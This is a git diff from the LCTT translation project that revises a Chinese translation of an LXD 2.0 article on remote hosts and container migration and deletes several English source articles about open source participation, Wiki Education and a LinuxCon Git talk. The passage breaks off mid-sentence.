-* Simplestreams:Simplestreams协议是LXD客户端和守护进程使用的只读、只有镜像的协议,以获取镜像信息以及从一些公共镜像服务器(如Ubuntu镜像)导入镜像。 +* LXD 1.0 API:这是在客户端和 LXD 守护进程之间使用的 REST API,以及在 LXD 守护进程间复制/移动镜像和容器时使用的 REST API。 +* Simplestreams:Simplestreams 协议是 LXD 客户端和守护进程使用的只读、仅针对镜像的协议,用于客户端和 LXD 守护进程获取镜像信息以及从一些公共镜像服务器(如 Ubuntu 镜像)导入镜像。 以下所有内容都将使用这两个协议中的第一个。 ### 安全 -LXD API的验证是通过使用最近的密钥通过TLS 1.2的客户端证书验证。 当两个LXD守护程序必须直接交换信息时,源守护程序生成一个临时令牌,并通过客户端传输到目标守护程序。 此令牌仅可用于访问特定流,并且立即被撤销,因此不能重新使用。 +LXD API 的验证是通过客户端证书在 TLS 1.2 上使用最近的密钥验证的。 当两个 LXD 守护进程必须直接交换信息时,源守护程序生成一个临时令牌,并通过客户端传输到目标守护程序。 此令牌仅可用于访问特定流,并且会被立即撤销,因此不能重新使用。 -为了避免中间人攻击,客户端工具还将源服务器的证书发送到目标。 这意味着对于特定的下载操作,目标服务器会被提供源服务器的URL、需要的资源的一次性访问令牌以及服务器应该使用的证书。 这可以防止MITM攻击,并且只允许临时访问传输对象。 +为了避免中间人攻击,客户端工具还将源服务器的证书发送到目标服务器。这意味着对于特定的下载操作,目标服务器会被提供源服务器的 URL、所需资源的一次性访问令牌以及服务器应该使用的证书。 这可以防止中间人攻击,并且只允许临时访问所传输的对象。 ### 网络需求 -LXD 2.0使用一种模型,它其中操作的目标(接收端)直接连接到源以获取数据。 +LXD 2.0 使用这样一种模型,某个操作的目标(接收端)直接连接到源以获取数据。 这意味着你必须确保目标服务器可以直接连接到源、可以更新任何所需的防火墙。 -我们有个[允许反向连接的计划][1],允许通过客户端本身代理以应对那些严格的防火墙阻止两台主机之间通信的罕见情况。 +我们有个[允许反向连接的计划][1],允许通过客户端代理本身以应对那些严格的防火墙阻止两台主机之间通信的罕见情况。 ### 与远程主机交互 -LXD使用的是“remotes”的概念,而不是让我们的用户总是提供主机名或IP地址,然后在他们想要与远程主机交互时验证证书信息。 +LXD 使用的是“远程”的概念,而不是让我们的用户总是提供主机名或 IP 地址,然后在他们想要与远程主机交互时验证证书信息。 -默认情况下,唯一真正的LXD远程配置是“local:”,这也是默认远程(所以你不必输入它的名称)。本地远程使用LXD REST API通过unix套接字与本地守护进程通信。 +默认情况下,唯一真正的 LXD 远程配置是 `local:`,这也是默认的远程(所以你不必输入它的名称)。这个本地(`local:`)远程使用 LXD REST API 通过 unix 套接字与本地守护进程通信。 -### 添加一台远程主机 +#### 添加一台远程主机 -假设你已经有两台装有LXD的机器,你的本机以及远程那台我们称为“foo”的主机。 +假设你已经有两台装有 LXD 的机器:你的本机以及远程那台我们称为“foo”的主机。 -首先你需要确保“foo”正在监听网络,并设置了一个密码,因此在远程shell上运行: +首先你需要确保“foo”正在监听网络,并设置了一个密码,以便得到一个远程 shell,运行: ``` lxc config set core.https_address [::]:8443 lxc config set core.trust_password something-secure ``` -在你本地LXD上,你需要使它对网络可见,这样我们可以从它传输容器和镜像: +在你本地 LXD 上,你需要使它对网络可见,这样我们可以从它传输容器和镜像: ``` lxc config set core.https_address [::]:8443 ``` -现在守护进程的配置已经在两段完成了,你可以添加“foo”到你的本地客户端: +现在已经在两端完成了守护进程的配置,你可以添加“foo”到你的本地客户端: ``` lxc remote add foo 1.2.3.4 ``` -(将 1.2.3.4 替换成你的IP或者FQDN) +(将 1.2.3.4 替换成你的 IP 或者 FQDN) 看上去像这样: @@ -88,11 +88,11 @@ stgraber@dakara:~$ lxc remote list +-----------------+-------------------------------------------------------+---------------+--------+--------+ ``` -### 与它交互 +#### 与它交互 好了,所以我们已经有了一台定义好的远程服务器,我们现在可以做些什么? -好了,就如你看到现在的,唯一的不同是你不许告诉LXD要哪台主机运行。 +现在,就如你看到的,唯一的不同是你必须告诉 LXD 要哪台主机运行。 比如: @@ -100,13 +100,13 @@ stgraber@dakara:~$ lxc remote list lxc launch ubuntu:14.04 c1 ``` -它会在默认主机(“lxc remote get-default”)也就是你的本机上运行。 +它会在默认主机(`lxc remote get-default`),也就是你的本机上运行。 ``` lxc launch ubuntu:14.04 foo:c1 ``` -这个会在foo上运行。 +这个会在 foo 上运行。 列出远程主机正在运行的容器可以这么做: @@ -125,13 +125,13 @@ stgraber@dakara:~$ lxc list foo: lxc launch foo:my-image foo:c2 ``` -最后,就如你希望的那样得到一个远程容器的shell: +最后,就如你希望的那样得到一个远程容器的 shell: ``` lxc exec foo:c1 bash ``` -### 复制容器 +#### 复制容器 在两台主机间复制容器就如它听上去那样简单: @@ -146,9 +146,9 @@ lxc snapshot foo:c1 current lxc copy foo:c1/current c3 ``` -### 移动容器 +#### 移动容器 -除非你在做实时更新(将会在之后的文章中覆盖),不然你需要在移动前先停止容器,接着就会如你预料的那样。 +除非你在做实时迁移(将会在之后的文章中讲到),不然你需要在移动前先停止容器,接着就会如你预料的那样。 ``` lxc stop foo:c1 @@ -164,30 +164,29 @@ lxc move foo:c1 c1 ### 这些如何工作 -正如你期望的那样, 与远程容器的交互时LXD只使用完全相同的HTTPS传输的API,而不是通过本地Unix套接字使用REST API。 +正如你期望的那样, 与远程容器的交互时 LXD 使用的 REST API 并不是通过本地 Unix 套接字,而是通过 HTTPS 传输。 当两个守护程序之间交互时会变得有些棘手,如复制和移动的情况。 -有有以下这些情况: +在这种情况下会发生: -1.用户运行“lxc move foo:c1 c1”。 -2.客户端联系本地:远程以检查现有的“c1”容器。 -3.客户端从“foo”获取容器信息。 -4.客户端从源“foo”守护程序请求迁移令牌。 -5.客户端将迁移令牌以及源URL和“foo”证书发送到本地LXD守护程序以及容器配置和周围设备。 -6.然后本地LXD守护程序使用提供的令牌直接连接到“foo” -  A.它连接到第一个控制websocket -  B.它协商文件系统传输协议(zfs发送/接收,btrfs发送/接收或者纯rsync) -  C.如果在本地可用,它会解压用于创建源容器的镜像。这是为了避免不必要的数据传输。 -  D.然后它会将容器及其任何快照作为增量传输。 -7.如果成功,客户端会命令“foo”删除源容器。 +1. 用户运行`lxc move foo:c1 c1`。 +2. 客户端联系 `local:` 远程以检查是否现有“c1”容器。 +3. 客户端从“foo”获取容器信息。 +4. 客户端从源“foo”守护程序请求迁移令牌。 +5. 客户端将迁移令牌以及源 URL 和“foo”的证书发送到本地 LXD 守护程序以及容器配置和周围设备。 +6. 然后本地 LXD 守护程序使用提供的令牌直接连接到“foo” + a) 它连接到第一个控制 websocket +   b) 它协商文件系统传输协议(zfs 发送/接收,btrfs 发送/接收或者纯 rsync) +   c) 如果在本地可用,它会解压用于创建源容器的镜像。这是为了避免不必要的数据传输。 +   d) 然后它会将容器及其任何快照作为增量传输。 +7. 如果成功,客户端会命令“foo”删除源容器。 ### 在线尝试 没有两台机器来尝试远端交互和复制/移动容器? -没有问题,你可以使用我们的[demo服务][2]。 -这里甚至还包括了一步步的指导! +没有问题,你可以使用我们的 [demo 服务][2]。这里甚至还包括了一步步的指导! ### 额外信息 @@ -202,11 +201,11 @@ LXD 的 IRC 频道: #lxcontainers on irc.freenode.net -------------------------------------------------------------------------------- -via: https://www.stgraber.org/2016/03/19/lxd-2-0-your-first-lxd-container-312/ +via: https://www.stgraber.org/2016/04/12/lxd-2-0-remote-hosts-and-container-migration-612/ 作者:[Stéphane Graber][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 组织翻译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/sources/talk/20170109 How to get started as an open source programmer.md b/sources/talk/20170109 How to get started as an open source programmer.md deleted file mode 100644 index 45d6975e69..0000000000 --- a/sources/talk/20170109 How to get started as an open source programmer.md +++ /dev/null @@ -1,150 +0,0 @@ -#rusking translating -How to get started as an open source programmer -============================================================ - ![How to get started as an open source programmer](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/programming_keys.jpg?itok=_VDcN66X "How to get started as an open source programmer") - -Image credits :  - -Zagrev on [Flickr][1]. [CC BY-SA 2.0][2] - -Looking out at the world of technology is exciting. It has a lot of moving parts, and it seems the further you dig into it, the deeper it gets, and then it's [turtles all the way down][3]. For that very reason, technology is also overwhelming. Where do you start if you're keen to join in and help shape the way the modern world functions? What's the first step? What's the twentieth step? - -The first thing to understand is that open source is open. This might seem obvious, but the phrase "open source" is thrown around so often these days that sometimes people forget it's just a description of a cultural phenomenon, not the name of a Fortune 500 company. Unlike other jobs or groups, you don't have to interview or complete a sign-up sheet or registration form to become an open source programmer. All you do to become an open source programmer is _program_and then share your code, ideally with a guarantee that the code remains open regardless of how it's used. - -That's it. You're an open source programmer! - -You now have your destination, but what about the logistics? - -### Skill trees - -Have you ever played an RPG? In these games, there's the concept of linear "skill trees". When you play, you acquire basic skills that you build upon to "level up" and get new skills, which you use to acquire new ones and "level up" again. And so on. - -Becoming a programmer is a little like adding to your skill tree. You get some basic skills, you practice them until they're second nature, and then you get new skills, and so on, and then you are progressing along your chosen skill tree. - -You'll find you'll encounter more than one skill tree. Open source has many entry points and many individuals with their own unique strengths, talents, and interests. However, certain definable skills contribute to being a great programmer, and developing them is an important part of participating successfully in open source projects. - -### Scripting - - ![Scroll--How to program ](https://opensource.com/sites/default/files/scroll.png "Scroll--How to program") - -One of the biggest advantages of a POSIX system like Linux or BSD is that every time you use your computer, you've got the opportunity to practice a little programming. If you have no idea where to start programming, then begin with how you work. Find repetitive tasks that you perform every day, and start automating them. This step can be something simple, like converting or re-sizing batches of photos, checking email, or even just getting the five applications you use each day launched with one click. Whatever the task, take the time to automate something for yourself. - -If you can do something from a terminal, then it can be scripted. Learn `bash` or `tsch` and let system scripting be your introduction to writing code and to how your system works. - -### Sysadmin - - ![Caesar head](https://opensource.com/sites/default/files/caesar_0.png "Caesar head") - -From this point, you can continue on to become a programmer, or you can cross over to a different skill tree entirely: that of systems administration. The two careers have some overlap (a good sysadmin ought to have a little programming experience, and should be ready to wield Python, Perl, or a similar language to develop unique solutions), but a _programmer_ is someone who builds with code day in and day out. - -### Programmer - - ![Wizard hat--How to program](https://opensource.com/sites/default/files/pointy-hat.png "Wizard hat--How to program") - -Open source is a great way to learn programming skills; you get to look at other people's code, borrow ideas and techniques, learn from their mistakes, get a critique of your own code, and if you use Linux or BSD, the _entire_ stack is open to you—as far as the eye can see, it's all yours for the taking. - -That's what the travel brochure says, anyway. The reality is that you're probably not going to start digging into the source code of a project and come out the other side with the sudden realization that you accidentally learned to code. Programming is hard work. If it wasn't, everyone would do it. - -Luckily, programming is logical and structured, so it builds upon itself. You might not fall into programming, but the more you poke at it, the more you start to understand it. - -Understanding how to control and automate a computer is one thing, but knowing how to write the stuff that other people want to automate is the point that you cross over into the realm of _programming_. - -### Polyglot - - ![Parrot--How to Program](https://opensource.com/sites/default/files/parrot-head.png "Parrot--How to Program") - -All programming languages aim to do the same thing: make computers compute. Choosing one is a mix of what you think you want to do, what (if any) language is in common use in the industry you are targeting, and what language you happen to best understand given the materials available to you and your learning style. - -With a little bit of research, you can get a good idea of a language's complexity, and then decide what to try first based on your own level of comfort. - -Another way to choose a language is to look at your goal, find out if other people are working toward the same thing, and then look at what they're using. If your aim is to develop desktop tools, you might learn C and Vala for one, or C++ for another. - -At the end of the day, though, don't get overwhelmed with all the available choices. Languages stack well. Once you learn one programming language well enough to fall back on it when you need to get something done, you'll find it a lot easier to pick up another one. A "language" is just a set of syntax and rules, after all; learn one, and it's fairly trivial to superimpose new rules over the same theory. - -The primary goal is to learn a language. Pick the one that makes sense to you or the one that's most appealing to you or the one that your friends are using or the one that has the documentation you understand best, but focus on one and learn it. - -### Open Whazzit? - -Whether or not you're just learning to program or you're an old pro just getting into open source, before jumping head first into this brave new world, you need to learn what makes open source, well, "open source." - -Claiming software is open source is the latest marketing approach some software vendors are wielding. Unfortunately, some vendors just mean they've released a public API or that they're receptive ("open") to suggestions from their users. The word "open" isn't trademarked and no committee governs how or when the word is used. However, the [Open Source Initiative][4], co-founded by the late Ian Murdock of Debian Linux, [defines][5] what open source means (licenses that "allow software to be freely used, modified, and shared"), and formally approves and [tracks][6]licenses deemed truly "open." - -Apply one of those licenses to your code, and you're an open source programmer. Congratulations! - -### Community - - ![Community--How to program](https://opensource.com/sites/default/files/minions.png "Community--How to program") - -Ask any open source enthusiast and they'll tell you the most important thing about open software is the people. Without motivated contributors, software stagnates. Computers need users, bug reporters, designers, and programmers. - -If you want to join or cultivate the global open source community, you need to become a part of the community, even if you're not a people person. This usually encompasses subscribing to mailing lists, joining IRC channels, or hopping onto forums, and starting at the bottom of the totem pole. Any mature community has been around long enough to see prospective members come and go, so you have to understand that when you saunter in ready to change their world, before they all agree to your master plan, you have to prove that you're not going to disappear after three months when something sparkly on the other side of the Net catches your eye. Be ready for the long haul if you aspire to something big. - -If you're just around to lend a hand, then that's acceptable, too. I myself have submitted small patches to projects, and sometimes the project leads think these are good and other times they reject them. If the rejected patch is important to me, I maintain it for myself and clients, and otherwise I move forward. - -It's part of the process. - -Where do these communities exist? It depends on the project. Some projects have dedicated community managers who help bring everyone together in public spaces for everyone to see. Other projects form around forums, use mailing lists, or even issue trackers. Look for the communities, and you'll find them. - -Just as importantly, though, look at the code! They call it open "source" for a reason, so be sure to find the code and take a peek. Even if it's still above your level of full comprehension, it gives you an idea of how the software project organizes itself and possibly where they might need assistance. How is the code organized? Does the code have comments? Is it tidy with a consistent style? Review the documentation, particularly the README, LICENSE, or COPYING files. - -Don't under estimate the importance of following through on the promise of open code. It's the reason you're getting involved, so look at it critically from every angle to see what you can learn from it and how you might contribute. - -Finding the best community is a lot like dating, but specifically it's like dating in [Groundhog Day][7]. It takes time, and the first couple of tries might fall flat. The more you go through the process, the more you start to feel déjà vu. Eventually, though, you learn enough about yourself and your interests, you find the right combination of other people, and you settle in somewhere. Have patience, and let it happen naturally. - -### Actions > Words - - ![Wingfoot--How to Program](https://opensource.com/sites/default/files/wingfoot.png "Wingfoot--How to Program") - -Being an open source programmer is about the code (the "source" part of open source), and ideas are a dime a dozen. What speaks volumes is producing. You need to show you know what you're doing, willing to get your hands dirty, spend your time on the project, and can back up your ideas with something that compiles. - -To do that effectively, of course, you should do your homework on the project itself, including learning how a project prefers to receive submissions and which branches are the stable and development ones. - -To approach getting started: - -* Get familiar with a project and its development culture, and be respectful of it. -* Write patches, bug fixes, or small, requested features, and submit them. -* Don't get discouraged if your work is rejected. You are not being rejected personally, your work was evaluated and the development team made a call. -* Don't get discouraged if your work is accepted, but changed beyond recognition. -* Rinse, repeat, and try new and bigger changes. - - ![Leaderboard--How to program](https://opensource.com/sites/default/files/leaderboard.png "Leaderboard--How to program") - -There is no leaderboard in open source. Some sites try to make it seem like they have such a thing, but there isn't one. Participate, contribute, add to the pool of ideas, add to the stash of commits, and you're doing it right. - -### Develop - - ![Treasure Map--How to Program](https://opensource.com/sites/default/files/treasure-map.png "Treasure Map--How to Program") - -Programming in any environment is always, ultimately, about personal development. Whether you're searching for new ways of solving problems, looking for new ways to optimize code, learning a new language, or learning how to deal with other people better, you never want to stop growing. The more you develop yourself, the more a project benefits. - -Growth, both personal and professional, is the final one on the list, but it actually persists through the entire process. Becoming an open source programmer isn't like getting a government job; it's a process. You learn, you share, you keep learning, you get distracted and write a [Game of Life][8] implementation, and you learn some more. - -This process is what open source is about: the freedom to develop, in every sense of the word. So go find your skill tree, choose your super powers, pay your dues, level up, and get involved. - --------------------------------------------------------------------------------- - -作者简介: - -![](https://opensource.com/sites/default/files/styles/profile_pictures/public/penguinmedallion200x200.png?itok=ROQSR50J) - -Seth Kenlon - Seth Kenlon is an independent multimedia artist, free culture advocate, and UNIX geek. He is one of the maintainers of the Slackware-based multimedia production project, http://slackermedia.ml - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/1/how-get-started-open-source-programmer - -作者:[Seth Kenlon][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/seth -[1]:https://www.flickr.com/photos/zagrev/79470567/in/photolist-82iQc-pijuye-9CmY3Z-c1EJAf-4Y65Zt-dhLziB-51QVc-hjqkN-4rNTuC-5Mbvqi-5MfK13-7dh6AW-2fiSu7-48R7et-5sC5ck-qf1TE9-48R6qv-pXuSG9-KFBLJ-95jQ8U-jBR7-dhLpfV-5bCZVH-9vsPTT-bA2nvP-bn7cWw-d7j8q-ubap-pij32X-7WT6iw-dcZZm2-3knisv-4dgN2f-bc6V1-E9xar-EovvU-6T71Mg-pi5zwE-5SR26m-dPKXrn-HFyzb-3aJF9W-7Rvz19-zbewj-xMsv-7MFi3u-2mVokJ-nsVAx-7g5k-4jCbbP -[2]:https://creativecommons.org/licenses/by-nc-sa/2.0/ -[3]:https://en.wikipedia.org/wiki/Turtles_all_the_way_down -[4]:http://opensource.org/ -[5]:https://opensource.org/licenses -[6]:https://opensource.org/licenses/category -[7]:https://en.wikipedia.org/wiki/Groundhog_Day_(film) -[8]:https://en.wikipedia.org/wiki/Conway's_Game_of_Life diff --git a/sources/talk/20170116 Can academic faculty members teach with Wikipedia.md b/sources/talk/20170116 Can academic faculty members teach with Wikipedia.md deleted file mode 100644 index 0c0a8dd08f..0000000000 --- a/sources/talk/20170116 Can academic faculty members teach with Wikipedia.md +++ /dev/null @@ -1,75 +0,0 @@ -Can academic faculty members teach with Wikipedia? -============================================================ - ![Can academic faculty members teach with Wikipedia?](https://opensource.com/sites/default/files/styles/image-full-size/public/images/education/EDU_academics_520x292_ma.png?itok=9xFWOct6 "Can academic faculty members teach with Wikipedia?") -Image by :  - -opensource.com - -Since 2010, 29,000 students have completed the Wiki Ed program. They have added 25 million words to Wikipedia, or the equivalent of 85,000 printed pages of content. This is 66% of the total words in the last print edition of Encyclopedia Britannica. When Wiki Ed students are most active, they are contributing 10% of all the content being added to underdeveloped, academic content areas on Wikipedia. - -Eager to learn more I contacted LiAnna Davis, director of Programs for Wiki Ed, who enthusiastically agreed to answer my questions. - -Bonus: [Wiki Education Foundation (Wiki Ed)][1]'s platform is built on free software; find it at [WikiEdu Dashboard GitHub][2]. - -**How did Wiki Ed get started? Tell us a little bit about your background and how you got involved.** - -In 2010, the [Wikimedia Foundation][3] (WMF, the nonprofit that runs Wikipedia) noticed a trend that university faculty who were also Wikipedia editors (Wikipedians) were successfully incorporating Wikipedia editing assignments into their classes. WMF created a pilot program to answer the question: Can non-Wikipedian faculty members teach with Wikipedia if they have enough support for the Wikipedia editing portion of the course? - -I was part of the team hired in 2010 to work on the pilot and the answer we provided was a resounding "Yes." In 2013, the WMF spun off the American and Canadian versions of the program into a new nonprofit organization, the Wiki Education Foundation (Wiki Ed); I moved from WMF to Wiki Ed. Since we became our own organization, we've been able to focus on the program and grow its impact from 75 classes each year when the program was with WMF to 275 classes this term. - -**People automatically assume that college students are savvy in all things tech related, especially the Internet, but your website says, "University undergraduates may be tech-savvy, but that doesn't always mean they're digitally literate." Can you explain that?** - -Just because someone can figure out how to use their iPhone doesn't mean they can tell whether something they read online is trustworthy or not. As a [Stanford study][4] ("Evaluating Information: The Cornerstone of Civic Online Reasoning November 22, 2016.") recently showed, students aren't very media literate. However, when students are writing Wikipedia articles, they have to be. They need to follow Wikipedia's [Reliable Source][5] guideline, which says information on Wikipedia must be cited to a source that goes through some sort of fact checking, is independent, etc. For many students, such sourcing is the first time they've had to do more than just Google their topic and cite the first source they see. They need to understand which sources are reliable and which aren't, and they become more digitally literate consumers of information. - -**What do you say to those who make the statement: "Wikipedia isn't a reliable source."** - -Wikipedia is an encyclopedia, which is by definition a tertiary source. By the time students reach undergrad, they should be consulting primary and secondary sources, not tertiary sources, so no, students shouldn't be citing Wikipedia. But it's a great place to start your research, to give yourself a broad overview of a subject, and discover links to sources at the bottom of the article that you can consult. As we like to say, "Don't cite it! Write it!" - ->It puts students into the position of producers of knowledge, not just consumers of knowledge... - -**How can a professor's involvement in Wiki Ed change a student's learning experience higher education?** - -By teaching with Wikipedia, instructors provide students with valuable media literacy, critical thinking, online communications, and writing skills that they need to succeed, whether they continue in academia or enter the workforce upon graduation. It puts students into the position of producers of knowledge, not just consumers of knowledge, and gives them a meaningful assignment that actually makes a difference in the world, not just a rote academic exercise that gets thrown away at the end of a term. - -We're actively onboarding new classes for the spring term. Interested faculty should visit [the Wikipedia Education Foundation's Teach page][6] to get started. - -**What staff development is needed for a teacher to participate? How much training is necessary for students?** - -When you sign up on [the Wikipedia Education Foundation's Teach page][7], Wiki Ed provides an online orientation for new faculty on the basics of how to teach with Wikipedia. We also have a series of online training modules that we automatically assign to students based on the specific assignment (for example, if you want your students to add images, they'll get a module on images; if you don't, they won't). In a dozen disciplines, we also have specific guidebooks showing how to edit in that topic area on Wikipedia. In addition, we have staff who are experienced Wikipedia editors who can help answer students' and instructors' questions. Our system is quite extensive now; we supported more than 6,300 students this fall term, and we're used to working with faculty who have no experience editing Wikipedia, so that shouldn't keep anyone from doing the assignment. - -**What are Visiting Scholars?** - -Our program to encourage teaching with Wikipedia isn't the only connection we make between Wikipedia and academia. In the Visiting Scholars program, a university library or department will open up access to their collection to an established Wikipedia editor (called a "Visiting Scholar") who is lacking sources. Using this university login, the Visiting Scholar will have access to sources, so they can improve articles in broad subject areas of interest to the institution. It's a small but mighty program, because it takes a lot of work to get set up, but the Scholars produce a lot of truly fabulous content on Wikipedia. - -**Who are your partners and how important is their involvement to your success now and in the future?** - -We partner with academic associations who see the value in our work as a service to their discipline. Let's face it: when people want information about a topic, they don't go read the peer-reviewed journal articles published by those associations, they go to Wikipedia. By encouraging faculty in these associations to teach with Wikipedia, they're improving information on Wikipedia in those subject matters. Our partners enable us to reach large numbers of potential new faculty members, and enable us to dramatically improve content in a specific subject area through a partnership. - -We welcome donations at [on our Support Us page][8] if your readers want to support our work. - --------------------------------------------------------------------------------- - -作者简介: - -![](https://opensource.com/sites/default/files/styles/profile_pictures/public/donw2-crop.jpg?itok=OqOYd3A8) - -Don Watkins - Educator, education technology specialist, entrepreneur, open source advocate. M.A. in Educational Psychology, MSED in Educational Leadership, Linux system administrator, CCNA, virtualization using Virtual Box and VMware. Follow me at @Don_Watkins . - - -via: https://opensource.com/article/17/1/Wiki-Education-Foundation - -作者:[Don Watkins][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/don-watkins -[1]:https://wikiedu.org/ -[2]:https://github.com/WikiEducationFoundation/WikiEduDashboard -[3]:https://wikimediafoundation.org/wiki/Home -[4]:https://sheg.stanford.edu/upload/V3LessonPlans/Executive%20Summary%2011.21.16.pdf -[5]:https://en.wikipedia.org/wiki/Wikipedia:Identifying_reliable_sources -[6]:https://teach.wikiedu.org/ -[7]:http://teach.wikiedu.org/ -[8]:http://wikiedu.org/donate diff --git a/sources/talk/20170116 Terrible Ideas in Git.md b/sources/talk/20170116 Terrible Ideas in Git.md deleted file mode 100644 index fa68be973a..0000000000 --- a/sources/talk/20170116 Terrible Ideas in Git.md +++ /dev/null @@ -1,39 +0,0 @@ -Terrible Ideas in Git -============================================================ - - - ![Corey Quinn](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/corey-quinn-lcna.png?itok=IU3oGzfn "Corey Quinn") -"Git does let you do some extraordinarily powerful things. Powerful, of course, in this talk, is a polite euphemism for stupid," says Corey Quinn of FutureAdvisor at LinuxCon North America.[The Linux Foundation][2] - -"Git does let you do some extraordinarily powerful things. Powerful, of course, in this talk, is a polite euphemism for stupid," says Corey Quinn of FutureAdvisor at [LinuxCon North America][5]. Who hasn't experienced at least one moment of feeling like a complete dunce when using Git? Sure, Git is wonderful, everyone uses it, and you can do most of your work with a few basic commands. But it also has mighty powers to make us feel like we have no idea what we're doing. - -But that's really not being fair to ourselves. Nobody knows everything, and everyone knows something different. Quinn reminds us, "During the Q and A section for some of my talks, people sometimes raise their hand and say, "Well, I have a really dumb question," and you see people in there are, "Yeah! That's a really dumb question". But when they get an answer, those people are taking an awful lot of notes." - -![Git](https://www.linux.com/sites/lcom/files/styles/floated_images/public/heffalump-git-corey-quinn_0.png?itok=xh5JlnLW "Git") - -[Used with permission][1] - -Quinn starts his talk with some fun demonstrations of terrible things you can do with Git such as messing up an entire project by rebasing master and then making a forced push, mis-typing commands and getting scolded by Git, and committing large binaries. Then he demonstrates how to make these terrible things less terrible, such as managing large binaries more sanely. "You can commit large binaries. You can commit atrocities in Git. If you wind up needing to store large binaries, there are two tools out there that tend to really speed up loads. One is git-annex, which was was created by Joey Hess, a Debian developer, and git-lfs, which is supported by GitHub". - -Do you keep making the same typo, like typing "git stitis" when you want "git status"? Quinn has an answer for this: "Git does have built-in support for aliases, so you can use relatively long, complex things and alias it to a short Git command." You can also use shell aliases. - -Quinn says, "We've all heard about rebasing master, and then doing a forced push, a hilarious prank to all of your co-workers. What that does is it changes history, so that suddenly what happened before is not what people are actually working on, and everyone else winds up getting screwed in the process. A group of whales is called a 'pod', a group of crows is called a 'murder', and a group of developers is called a 'merge conflict'...On a more serious note, if someone does do something like this, you do have a few options." These include restoring master from a known good backup, revert commits, or "Hurl the person responsible, screaming, from the roof of your office." Or, take a dose of prevention and use a little-known Git feature called branch protection. When you enable branch protection, branches cannot be deleted or force-pushed, and pull requests must have at least one review before acceptance. - -Quinn demonstrates several more wonderfully useful tools to make Git more efficient and foolproof such as mr, vcsh, and customized shell prompts. You can see these in the complete video (below), and enjoy more silly jokes. - --------------------------------------------------------------------------------- - -via: https://www.linux.com/news/event/LinuxCon-Europe/2016/terrible-ideas-git-0 - -作者:[CARLA SCHRODER][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/cschroder -[1]:https://www.linux.com/licenses/category/used-permission -[2]:https://www.linux.com/licenses/category/linux-foundation -[3]:https://www.linux.com/files/images/heffalump-git-corey-quinnpng-0 -[4]:https://www.linux.com/files/images/corey-quinn-lcnapng -[5]:http://events.linuxfoundation.org/events/linuxcon-north-america diff --git a/sources/talk/20170118 How to gain confidence to participate in open source.md b/sources/talk/20170118 How to gain confidence to participate in open source.md deleted file mode 100644 index 7ab89779af..0000000000 --- a/sources/talk/20170118 How to gain confidence to participate in open source.md +++ /dev/null @@ -1,79 +0,0 @@ -GHLandy Translating - -How to gain confidence to participate in open source -============================================================ - ![How to gain confidence to participate in open source](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/open_community_lead.jpg?itok=anXgpnwG "How to gain confidence to participate in open source") -Image credits :  - -Original photo by [Gabriel Kamener, Sown Together][1], Modified by Jen Wike Huger - -As your brain develops, you learn about what you can and should do in the world, and what you can't and shouldn't. Your actions are influenced by surroundings and norms, and many times what keeps you from participating is a lack of self-confidence. - -Throughout our lives, we've been taught the "rules" in civil discourse and social behavior. We've been taught that that the speaker is notable, that the CEO has vision, that the teacher is the expert, that the police maintain control, that respect means being quiet and letting others have the floor, and if someone is wrong, gently speaking up, but only in certain situations—it's all a bit complicated. - -When participating in open source, self-confidence plays a huge role. Open source communities are inherently participatory. Participation is a currency in the open source world and that currency is contingent on self-confidence. The more you participate, hone your skills, network, and share your ideas and insights, the more you are able to improve the projects you commit to. All of these things require the belief that you have something valuable to share, and guess what, you do. - -Here's a truth: All of us have something valuable to share. Finding out what that thing is and where our sharing it makes the most positive impact is the point. - -Reflecting on this list will help you develop your self-confidence and make forging ahead in the open source community easier. - -### No one thinks about you as much as you think about yourself - -Reminding yourself that you are in control and that the judgement of others is likely nonexistent can help you gain self-confidence. - -We've been conditioned to understand that people around us are judging us for our actions. This conditioning is a byproduct of learning how to function as social creatures. Likely, it started in childhood when our parents implemented reward systems for how we acted. It continued into adolescence when teachers literally judged our performance and awarded grades and marks, comparing us to others. These systems of motivation and reward caused our brains to establish feedback loops that included self-reflection. We needed to determine if we would get the cookie and prepare ourselves for that eventuality. - -Today, we wonder, "What does this person think about me?" because of this, but the secret is that most people don't spend much time judging you. All of us are thinking about our own cookies. We each have our own ambitions to follow and our own problems to solve. Other people are busy worrying about how they affect people around them, and they aren't paying much attention to you. They likely don't notice if you make mistakes or talk too loud or recede into the background. All the doubts you have about yourself are in your head, not in anyone else's. - -Our desire to be accepted is part of what it means to be human, but acceptance comes at the whim of the person across from us. That person lacks the context of who we are, where we came from, the experiences that shaped us. we have no control. However, we can hope to influence this person through communication. - -In the community-intense world of open source, remembering that people are not thinking about you is especially important. Expect that your peers and mentors are concerned with other projects or community members. - -Once you acknowledge this, embrace the world of proactive communication. Ask for help, tell people what you need, and point out your contributions and remind people that you are there and that you are an active participant in an open community. Both your open source credibility and your self-confidence will improve when people start coming to you, instead of the other way around. - -### People love to share what they know - -Any successful open source community is a teaching and learning community. To get started in open source, not only do you need to be forthcoming with your own knowledge, you need to soak up the lessons other people have to offer. Fortunately, we humans love to share what we know. - -Think about how you feel when someone else asks you for your opinion. Knowing that someone values what you have to say is like a shot of sugar to your Id and Ego. - -As children, our physical brains are not developed enough for us to place ourselves into the larger context of the world and reality. We believe that we are the center of the universe. The majority of our cognitive function develops before we are six years old. During that time our parents respond to our cries and adults everywhere fulfill our desires. We are given evidence that we are the most important thing in the universe. - -Our neural pathways are established during this time, and our egos develop. As we learn to participate in social and civic life, little by little we learn that we aren't the 